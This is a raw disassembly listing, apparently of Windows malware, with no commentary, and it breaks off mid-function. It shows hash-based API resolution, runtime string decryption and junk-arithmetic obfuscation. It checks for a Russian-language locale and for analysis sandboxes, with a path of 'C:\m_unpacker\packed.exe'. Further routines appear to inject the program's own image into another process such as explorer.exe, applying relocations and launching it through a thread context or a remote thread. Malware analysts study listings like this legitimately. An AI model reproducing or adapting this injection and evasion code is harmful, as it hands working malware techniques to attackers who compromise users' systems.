var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
push ebp
mov ebp, esp
sub esp, 3B8h
push ebx
push esi
push edi
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
call sub_40102E
mov edi, 0C8AC8026h
xor ebx, ebx
push edi
inc ebx
push ebx
call sub_401117
add esp, 14h
push esi
call eax
push 0Ah
push esi
push offset loc_4031EC
call sub_40102E
push edi
push ebx
call sub_401117
add esp, 14h
push esi
call eax
push 0Ch
push esi
push offset dword_4031DC
call sub_40102E
push edi
push ebx
call sub_401117
add esp, 14h
push esi
call eax
push 0FFFFFFE5h
mov eax, ebx
pop edx
mov ecx, 0C3h
loc_401C6C: ; CODE XREF: sub_401BFB+7F�j
cmp edx, ecx
ja short loc_401C72
inc eax
inc edx
loc_401C72: ; CODE XREF: sub_401BFB+73�j
add eax, 2Eh
add edx, 2Eh
cmp eax, ecx
jl short loc_401C6C
push 7A813811h
xor ebx, ebx
push 1
mov dword_404104, eax
mov [ebp+var_28], ebx
call sub_401117
pop ecx
pop ecx
call eax
cmp dword_404104, 0A5h
movzx eax, ax
mov [ebp+var_24], eax
jge short loc_401CAE
inc dword_404104
loc_401CAE: ; CODE XREF: sub_401BFB+AB�j
push 3
push esi
push offset nullsub_1
call sub_40102E
push 67ECDE97h
push 1
call sub_401117
add esp, 14h
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_28]
push ecx
push ebx
push ebx
push esi
call eax
push 2
push esi
push offset dword_4031D4
call sub_40102E
push [ebp+var_28]
lea eax, [ebp+var_48]
push esi
push eax
call dword_403014 ; wsprintfA
add esp, 18h
cmp dword_404104, 0Eh
jl short loc_401D04
inc dword_404104
loc_401D04: ; CODE XREF: sub_401BFB+101�j
cmp dword_404104, 0C1h
jle short loc_401D1A
mov dword_404104, 19h
loc_401D1A: ; CODE XREF: sub_401BFB+113�j
push 0Ch
push esi
push offset dword_4031C4
call sub_40102E
mov edi, dword_403000
add esp, 0Ch
push esi
lea eax, [ebp+var_1B8]
push eax
call edi ; lstrcpy
push 9
push esi
push offset dword_4031B8
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_1A8]
push eax
call edi ; lstrcpy
push 9
push esi
push offset dword_4031AC
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_198]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_40319C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_188]
push eax
call edi ; lstrcpy
push 9
push esi
push offset dword_403190
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_178]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset dword_403184
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_168]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset dword_403178
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_158]
push eax
call edi ; lstrcpy
cmp word ptr [ebp+var_24], 419h
jz loc_402413
call sub_401094
test eax, eax
jnz loc_402413
call sub_401301
test al, al
jz short loc_401DFF
push ebx
call sub_401485
pop ecx
loc_401DFF: ; CODE XREF: sub_401BFB+1FB�j
mov [ebp+var_20], ebx
mov ebx, dword_40300C
loc_401E08: ; CODE XREF: sub_401BFB+59B�j
cmp [ebp+var_20], 0
jnz short loc_401E18
push 23h
push esi
push offset dword_403154
jmp short loc_401E20
; ---------------------------------------------------------------------------
loc_401E18: ; CODE XREF: sub_401BFB+211�j
push 24h
push esi
push offset dword_40312C
loc_401E20: ; CODE XREF: sub_401BFB+21B�j
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_3B8]
push eax
call edi ; lstrcpy
push 3
push esi
push offset dword_403128
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 19h
push esi
push offset dword_40310C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401786
add esp, 0Ch
push 2
push esi
push offset dword_403108
call sub_40102E
add esp, 0Ch
lea eax, [ebp+var_2B8]
push esi
push eax
call edi ; lstrcpy
cmp word ptr [ebp+var_24], 410h
jnz short loc_401F17
lea eax, [ebp+var_1A8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 6
push esi
push offset dword_403100
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401786
add esp, 0Ch
mov [ebp+var_C], eax
jmp loc_40211C
; ---------------------------------------------------------------------------
loc_401F17: ; CODE XREF: sub_401BFB+2C0�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Dh
push esi
push offset dword_4030F0
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401786
push 2
push esi
push offset dword_403108
mov [ebp+var_C], eax
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_178]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset dword_4030E4
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401786
add [ebp+var_C], eax
push 2
push esi
push offset dword_403108
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset dword_4030D8
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401786
add [ebp+var_C], eax
push 2
push esi
push offset dword_403108
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_198]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset dword_4030C8
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401786
add [ebp+var_C], eax
push 2
push esi
push offset dword_403108
call sub_40102E
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_188]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push (offset loc_4030BB+1)
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401786
add esp, 0Ch
add [ebp+var_C], eax
loc_40211C: ; CODE XREF: sub_401BFB+317�j
push 2
push esi
push offset dword_403108
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 5
push esi
push offset loc_4030B4
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401786
add eax, [ebp+var_C]
add esp, 0Ch
test eax, eax
jg short loc_4021A1
inc [ebp+var_20]
cmp [ebp+var_20], 2
jl loc_401E08
jmp loc_402411
; ---------------------------------------------------------------------------
loc_4021A1: ; CODE XREF: sub_401BFB+592�j
push 3
push esi
push offset dword_403128
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
cmp dword_404104, 28h
jge short loc_4021E7
inc dword_404104
loc_4021E7: ; CODE XREF: sub_401BFB+5E4�j
push 1Fh
push esi
push offset dword_403094
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
push 57h
pop eax
push 33h
pop ecx
loc_40221B: ; CODE XREF: sub_401BFB+633�j
cmp ecx, 0B5h
ja short loc_402225
inc eax
inc ecx
loc_402225: ; CODE XREF: sub_401BFB+626�j
add eax, 2Bh
add ecx, 2Bh
cmp eax, 69h
jl short loc_40221B
push 2
push esi
mov edi, offset dword_403090
push edi
mov dword_404104, eax
call sub_40102E
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_8]
add al, 1Dh
add esp, 18h
cmp byte ptr [ebp+var_8+1], 0
mov [ebp+var_13], al
jnz short loc_40226A
mov [ebp+var_11], 30h
jmp short loc_402272
; ---------------------------------------------------------------------------
loc_40226A: ; CODE XREF: sub_401BFB+667�j
mov al, byte ptr [ebp+var_8+1]
add al, 13h
mov [ebp+var_11], al
loc_402272: ; CODE XREF: sub_401BFB+66D�j
push 0Ch
pop eax
push 0FFFFFFF1h
pop ecx
loc_402278: ; CODE XREF: sub_401BFB+692�j
cmp ecx, 0ADh
ja short loc_402282
inc eax
inc ecx
loc_402282: ; CODE XREF: sub_401BFB+683�j
add eax, 16h
add ecx, 16h
cmp eax, 9Eh
jl short loc_402278
push 2
push esi
push edi
mov dword_404104, eax
call sub_40102E
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_4]
add al, 17h
add esp, 18h
cmp byte ptr [ebp+var_4+1], 0
mov [ebp+var_14], al
jnz short loc_4022C4
mov [ebp+var_12], 30h
jmp short loc_4022CC
; ---------------------------------------------------------------------------
loc_4022C4: ; CODE XREF: sub_401BFB+6C1�j
mov al, byte ptr [ebp+var_4+1]
add al, 19h
mov [ebp+var_12], al
loc_4022CC: ; CODE XREF: sub_401BFB+6C7�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_10], 0
call ebx ; lstrcat
push 7
push esi
push offset dword_403088
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
mov eax, dword_404104
add eax, 0FFFFFFD5h
cmp eax, 0C9h
ja short loc_402320
inc dword_404104
loc_402320: ; CODE XREF: sub_401BFB+71D�j
push 2
push esi
push edi
call sub_40102E
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_8]
add esp, 18h
test ah, ah
mov [ebp+var_1B], al
mov [ebp+var_1A], 30h
jz short loc_40234E
mov [ebp+var_1A], ah
loc_40234E: ; CODE XREF: sub_401BFB+74E�j
push 9
pop eax
push 0FFFFFFAEh
pop ecx
loc_402354: ; CODE XREF: sub_401BFB+76C�j
cmp ecx, 8Fh
ja short loc_40235E
inc eax
inc ecx
loc_40235E: ; CODE XREF: sub_401BFB+75F�j
add eax, 0Dh
add ecx, 0Dh
cmp eax, 7Ah
jl short loc_402354
push 2
push esi
push edi
mov dword_404104, eax
call sub_40102E
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_4]
add esp, 18h
test ah, ah
mov [ebp+var_19], al
mov [ebp+var_1C], 30h
jz short loc_40239C
mov [ebp+var_1C], ah
loc_40239C: ; CODE XREF: sub_401BFB+79C�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_18], 0
call ebx ; lstrcat
push 4
push esi
push offset dword_403080
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_401786
add esp, 0Ch
cmp dword_404104, 6
jl short loc_4023FB
inc dword_404104
loc_4023FB: ; CODE XREF: sub_401BFB+7F8�j
cmp dword_404104, 0B6h
jle short loc_402411
mov dword_404104, 21h
loc_402411: ; CODE XREF: sub_401BFB+5A1�j
; sub_401BFB+80A�j
xor ebx, ebx
loc_402413: ; CODE XREF: sub_401BFB+1E1�j
; sub_401BFB+1EE�j
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_401BFB endp
; =============== S U B R O U T I N E =======================================
sub_402429 proc near ; DATA XREF: sub_4027D7+5B�o
push esi
push edi
mov edi, 81F0F0DFh
push edi
push 1
call sub_401117
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
jmp short loc_402471
; ---------------------------------------------------------------------------
loc_40243F: ; CODE XREF: sub_402429+4F�j
push 1297812Ch
push 1
call sub_401117
pop ecx
pop ecx
call eax
cmp eax, 2
jz short loc_40247A
push 3D9972F5h
push 1
call sub_401117
pop ecx
pop ecx
push 3E8h
call eax
push edi
push 1
call sub_401117
loc_402471: ; CODE XREF: sub_402429+14�j
pop ecx
pop ecx
push esi
call eax
test eax, eax
jz short loc_40243F
loc_40247A: ; CODE XREF: sub_402429+29�j
pop edi
xor eax, eax
pop esi
retn 4
sub_402429 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402481 proc near ; CODE XREF: sub_4027D7+12D�p
; sub_402951+128�p ...
var_310 = dword ptr -310h
var_260 = dword ptr -260h
var_44 = byte ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 310h
push ebx
push esi
push edi
call sub_401113
and eax, 0FFFF0000h
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword_404104, 11h
mov [ebp+var_18], eax
lea eax, [ecx+18h]
mov esi, [eax+38h]
mov [ebp+var_24], ecx
mov [ebp+var_14], eax
mov [ebp+var_1C], esi
jl short loc_4024BD
inc dword_404104
loc_4024BD: ; CODE XREF: sub_402481+34�j
cmp dword_404104, 0CEh
jle short loc_4024D3
mov dword_404104, 27h
loc_4024D3: ; CODE XREF: sub_402481+46�j
push 0A08B638Ch
xor ebx, ebx
push 1
mov [ebp+var_1], bl
call sub_401117
pop ecx
pop ecx
push 9
call eax
mov edi, eax
mov eax, dword_404104
neg edi
sbb edi, edi
and edi, 3Ch
add eax, 0FFFFFF9Ch
add edi, 4
cmp eax, 90h
ja short loc_40250B
inc dword_404104
loc_40250B: ; CODE XREF: sub_402481+82�j
push 0EF0A25B7h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push esi
push ebx
push edi
push ebx
push 0FFFFFFFFh
call eax
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_402530
xor al, al
jmp loc_4027D2
; ---------------------------------------------------------------------------
loc_402530: ; CODE XREF: sub_402481+A6�j
push 5CD9430h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push 2
push [ebp+var_C]
call eax
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_4027AD
cmp dword_404104, 23h
jge short loc_402562
inc dword_404104
loc_402562: ; CODE XREF: sub_402481+D9�j
push 12h
mov esi, offset dword_404108
push esi
push offset dword_403218
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_44]
push eax
call dword_403000 ; lstrcpy
push 9
push esi
push offset dword_40320C
call sub_40102E
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 1FC0EAEEh
push 1
mov esi, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_44]
push ecx
push esi
call eax
cmp dword_404104, 8Dh
mov [ebp+var_10], ebx
jge short loc_4025CD
inc dword_404104
loc_4025CD: ; CODE XREF: sub_402481+144�j
mov esi, [ebp+var_1C]
push edi
push ebx
push 1
lea ecx, [ebp+var_20]
push ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_10]
push ecx
push [ebp+arg_4]
mov [ebp+var_20], esi
push [ebp+var_C]
call eax
mov edi, [ebp+var_18]
push esi
push edi
push [ebp+var_8]
call sub_4010EE
mov eax, dword_404104
lea ecx, [eax-5Ch]
add esp, 0Ch
cmp ecx, 81h
ja short loc_402610
inc eax
mov dword_404104, eax
loc_402610: ; CODE XREF: sub_402481+187�j
mov ecx, [ebp+var_24]
movzx ecx, word ptr [ecx+14h]
add ecx, [ebp+var_14]
cmp eax, 0Bh
jl short loc_402625
inc eax
mov dword_404104, eax
loc_402625: ; CODE XREF: sub_402481+19C�j
cmp eax, 0D5h
jle short loc_402634
push 15h
pop eax
mov dword_404104, eax
loc_402634: ; CODE XREF: sub_402481+1A9�j
mov esi, [ebp+var_10]
mov edx, esi
sub edx, edi
cmp eax, 3Fh
mov [ebp+var_14], edx
jge short loc_402649
inc eax
mov dword_404104, eax
loc_402649: ; CODE XREF: sub_402481+1C0�j
mov eax, [ecx+34h]
add eax, edi
loc_40264E: ; CODE XREF: sub_402481+1DE�j
cmp word ptr [eax], 0BE8Dh
jnz short loc_40265E
cmp dword ptr [eax+6], 0C009078Bh
jz short loc_402661
loc_40265E: ; CODE XREF: sub_402481+1D2�j
inc eax
jmp short loc_40264E
; ---------------------------------------------------------------------------
loc_402661: ; CODE XREF: sub_402481+1DB�j
mov eax, [eax+2]
add eax, [ecx+0Ch]
add eax, edi
jmp short loc_402678
; ---------------------------------------------------------------------------
loc_40266B: ; CODE XREF: sub_402481+1F9�j
add eax, 8
jmp short loc_402671
; ---------------------------------------------------------------------------
loc_402670: ; CODE XREF: sub_402481+1F3�j
inc eax
loc_402671: ; CODE XREF: sub_402481+1ED�j
cmp [eax], bx
jnz short loc_402670
inc eax
inc eax
loc_402678: ; CODE XREF: sub_402481+1E8�j
cmp [eax], ebx
jnz short loc_40266B
push 2Ch
pop edi
push 4
pop edx
loc_402682: ; CODE XREF: sub_402481+217�j
cmp edx, 0BEh
ja short loc_40268C
inc edi
inc edx
loc_40268C: ; CODE XREF: sub_402481+207�j
add edi, 2Dh
add edx, 2Dh
cmp edi, 0B9h
jl short loc_402682
mov edx, [ebp+var_8]
mov dword_404104, edi
mov ecx, [ecx+0Ch]
add eax, 4
lea edx, [ecx+edx-4]
mov cl, [eax]
inc eax
cmp cl, bl
jz short loc_4026E4
loc_4026B4: ; CODE XREF: sub_402481+258�j
cmp cl, 0F0h
jnb short loc_4026C0
movzx ecx, cl
add edx, ecx
jmp short loc_4026CF
; ---------------------------------------------------------------------------
loc_4026C0: ; CODE XREF: sub_402481+236�j
movzx esi, word ptr [eax]
and ecx, 0Fh
shl ecx, 10h
or ecx, esi
add edx, ecx
inc eax
inc eax
loc_4026CF: ; CODE XREF: sub_402481+23D�j
mov ecx, [ebp+var_14]
add [edx], ecx
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4026B4
mov esi, [ebp+var_10]
mov edi, dword_404104
loc_4026E4: ; CODE XREF: sub_402481+231�j
lea eax, [edi-9]
cmp eax, 0EEh
ja short loc_4026F5
inc edi
mov dword_404104, edi
loc_4026F5: ; CODE XREF: sub_402481+26B�j
sub esi, [ebp+var_18]
add esi, [ebp+arg_0]
cmp [ebp+arg_8], ebx
mov edi, esi
jnz short loc_40273D
push 0E61874B3h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push edi
push ebx
push ebx
push [ebp+arg_4]
call eax
push 723EB0D5h
push 1
mov edi, eax
call sub_401117
pop ecx
pop ecx
push edi
call eax
mov eax, dword_404104
add eax, 0FFFFFFEEh
cmp eax, 0C0h
jmp short loc_40278E
; ---------------------------------------------------------------------------
loc_40273D: ; CODE XREF: sub_402481+27F�j
push 0AA1DE02Fh
push 1
mov [ebp+var_310], 10002h
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
push 0AA1DC82Fh
push 1
mov [ebp+var_260], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
mov eax, dword_404104
add eax, 0FFFFFFC7h
cmp eax, 0B3h
loc_40278E: ; CODE XREF: sub_402481+2BA�j
mov [ebp+var_1], 1
ja short loc_40279A
inc dword_404104
loc_40279A: ; CODE XREF: sub_402481+311�j
push 77CD9567h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_4027AD: ; CODE XREF: sub_402481+CC�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
cmp dword_404104, 6Ch
jge short loc_4027CF
inc dword_404104
loc_4027CF: ; CODE XREF: sub_402481+346�j
mov al, [ebp+var_1]
loc_4027D2: ; CODE XREF: sub_402481+AA�j
pop edi
pop esi
pop ebx
leave
retn
sub_402481 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027D7 proc near ; DATA XREF: sub_402951+123�o
; sub_402951+2E1�o
var_14C = byte ptr -14Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14Ch
push ebx
push edi
xor ebx, ebx
push 3D9972F5h
inc ebx
push ebx
call sub_401117
pop ecx
pop ecx
push 7D0h
call eax
push 31h
pop eax
push 0FFFFFFE8h
pop ecx
loc_4027FF: ; CODE XREF: sub_4027D7+3B�j
cmp ecx, 0AAh
ja short loc_402809
inc eax
inc ecx
loc_402809: ; CODE XREF: sub_4027D7+2E�j
add eax, 30h
add ecx, 30h
cmp eax, 7Ah
jl short loc_4027FF
push esi
push 6FB89AF0h
xor edi, edi
push ebx
mov dword_404104, eax
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push edi
push edi
push offset sub_402429
push edi
push edi
call eax
push 723EB0D5h
push ebx
mov esi, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
push 49A1374Ah
push ebx
call sub_401117
pop ecx
pop ecx
push 104h
lea ecx, [ebp+var_14C]
push ecx
call eax
push 0Ch
mov esi, offset dword_404108
push esi
push offset dword_40322C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_14C]
push eax
call dword_40300C ; lstrcat
push 40h
lea eax, [ebp+var_44]
push edi
push eax
mov [ebp+var_48], 44h
call sub_4010BB
add esp, 0Ch
push 36h
pop eax
push 0FFFFFFDEh
mov [ebp+var_1C], ebx
mov [ebp+var_18], 5
pop ecx
loc_4028B0: ; CODE XREF: sub_4027D7+EE�j
cmp ecx, 8Ah
ja short loc_4028BA
inc eax
inc ecx
loc_4028BA: ; CODE XREF: sub_4027D7+DF�j
add eax, 2Eh
add ecx, 2Eh
cmp eax, 8Eh
jl short loc_4028B0
push 46318AC7h
push ebx
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push offset dword_40420C
lea ecx, [ebp+var_48]
push ecx
push edi
push edi
push 4
push edi
push edi
push edi
lea ecx, [ebp+var_14C]
push ecx
push edi
call eax
push dword_404210
push dword_40420C
push offset sub_401BFB
call sub_402481
add esp, 0Ch
test al, al
jz short loc_402926
mov esi, dword_404210
push 7B88BF3Bh
push ebx
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_402926: ; CODE XREF: sub_4027D7+137�j
cmp dword_404104, 9Fh
pop esi
jge short loc_402939
inc dword_404104
loc_402939: ; CODE XREF: sub_4027D7+15A�j
push 768AA260h
push ebx
call sub_401117
pop ecx
pop ecx
push edi
call eax
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_4027D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402951 proc near ; CODE XREF: start+1BC�j
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_38 = byte ptr -38h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_13C]
push edi
mov [ebp+var_4], eax
call sub_401301
xor ebx, ebx
test al, al
jz loc_402C77
mov eax, dword_404104
add eax, 0FFFFFFDBh
cmp eax, 0B8h
ja short loc_40298A
inc dword_404104
loc_40298A: ; CODE XREF: sub_402951+31�j
mov edi, 774393E8h
push edi
push 1
call sub_401117
pop ecx
pop ecx
mov esi, 104h
push esi
lea ecx, [ebp+var_13C]
push ecx
push ebx
call eax
xor ecx, ecx
cmp eax, ebx
jz short loc_4029C4
loc_4029AF: ; CODE XREF: sub_402951+71�j
lea edx, [ebp+ecx+var_13B]
cmp byte ptr [edx-1], 5Ch
jnz short loc_4029BF
mov [ebp+var_4], edx
loc_4029BF: ; CODE XREF: sub_402951+69�j
inc ecx
cmp ecx, eax
jnz short loc_4029AF
loc_4029C4: ; CODE XREF: sub_402951+5C�j
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, 20202020h
or edx, eax
cmp edx, 6C707865h
jnz loc_402ABE
mov edx, [ecx+4]
or edx, eax
cmp edx, 7265726Fh
jnz loc_402ABE
mov ecx, [ecx+8]
or ecx, eax
cmp ecx, 6578652Eh
jnz loc_402ABE
mov eax, [ebp+arg_4]
dec eax
jnz loc_402AB7
push 8
pop ecx
push 0Ch
mov esi, offset dword_404108
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset dword_40323C
rep stosd
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_401485
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_402AB7
mov eax, dword_404104
add eax, 0FFFFFFADh
cmp eax, 75h
ja short loc_402A55
inc dword_404104
loc_402A55: ; CODE XREF: sub_402951+FC�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push ebx
push 1F0FFFh
call eax
mov esi, eax
cmp esi, ebx
jz short loc_402AB7
push ebx
push esi
push offset sub_4027D7
call sub_402481
add esp, 0Ch
cmp dword_404104, 0Bh
jl short loc_402A90
inc dword_404104
loc_402A90: ; CODE XREF: sub_402951+137�j
cmp dword_404104, 0EDh
jle short loc_402AA6
mov dword_404104, 1Fh
loc_402AA6: ; CODE XREF: sub_402951+149�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_402AB7: ; CODE XREF: sub_402951+B1�j
; sub_402951+EF�j ...
xor eax, eax
jmp loc_402C9F
; ---------------------------------------------------------------------------
loc_402ABE: ; CODE XREF: sub_402951+85�j
; sub_402951+96�j ...
push edi
xor edi, edi
inc edi
push edi
call sub_401117
pop ecx
pop ecx
push esi
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push ebx
call eax
push 0D89AD05h
push edi
call sub_401117
pop ecx
pop ecx
call eax
push 3Eh
mov esi, eax
pop eax
push 35h
pop ecx
loc_402AEA: ; CODE XREF: sub_402951+1AE�j
cmp ecx, 0DAh
ja short loc_402AF4
inc eax
inc ecx
loc_402AF4: ; CODE XREF: sub_402951+19F�j
add eax, 11h
add ecx, 11h
cmp eax, 0B0h
jl short loc_402AEA
push 80DBBE07h
push 6
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+arg_4]
push ecx
push 20h
push esi
call eax
test eax, eax
mov esi, offset dword_404108
jz loc_402BBC
push 10h
push esi
push offset nullsub_2
call sub_40102E
push 1B3D12B9h
push 6
call sub_401117
